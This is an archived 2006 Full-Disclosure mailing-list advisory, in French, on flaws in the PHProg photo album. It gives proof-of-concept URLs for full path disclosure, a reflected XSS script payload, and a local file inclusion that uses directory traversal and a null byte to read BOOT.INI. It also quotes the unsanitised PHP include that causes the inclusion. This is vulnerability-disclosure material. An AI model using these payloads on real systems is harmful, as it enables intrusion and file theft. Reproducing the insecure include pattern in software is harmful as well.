[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] PHProg : Local File Inclusion + XSS + Full path
From: "..." <cdg393 () gmail ! com>
Date: 2006-09-11 9:03:49
Message-ID: d2c8d5d80609110203q20a6e932gc7d23f6b431d5293 () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
(11/09/06)
* Produit vulnérable : PHProg ( Album photo en PHP )
* Site officiel du produit : http://www.PHProg.com/
* Failles de sécurité décelées :
1] Full path disclosure : http://localhost/PHProg/?id=1&album=cdg393
2] Cross Site Scripting ( XSS ) : http://localhost/PHProg/?id=1&album=
<script>alert('cdg393')</script>
3] Local File Inclusion :
http://localhost/PHProg/index.php?lang=../../../../../../BOOT.INI%00
Ligne 59 => $lang=$_GET['lang'];
Ligne 61 => include("lang/$lang.php");
* Credits : cdg393 : cdg.new.fr =)
[Attachment #5 (text/html)]
(11/09/06)<br><br>* Produit vulnérable : PHProg ( Album photo en PHP )<br><br>* Site \
officiel du produit : <a \
href="http://www.PHProg.com/">http://www.PHProg.com/</a><br><br>* Failles de sécurité \
décelées :<br><br>1] Full path disclosure : <a \
href="http://localhost/PHProg/?id=1&album=cdg393">http://localhost/PHProg/?id=1&album=cdg393</a><br><br>2] \
Cross Site Scripting ( XSS ) : <a \
href="http://localhost/PHProg/?id=1&album=">http://localhost/PHProg/?id=1&album=
</a><script>alert('cdg393')</script><br><br>3] Local File \
Inclusion : <a \
href="http://localhost/PHProg/index.php?lang=../../../../../../BOOT.INI%00">http://localhost/PHProg/index.php?lang=../../../../../../BOOT.INI%00
</a><br><br> Ligne \
59 \
=> \
$lang=$_GET['lang'];<br> Ligne \
61 \
=> \
include("lang/$lang.php");<br> \
\
\
<br>* Credits : cdg393 : <a \
href="http://cdg.new.fr">cdg.new.fr</a> =) <br><br>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic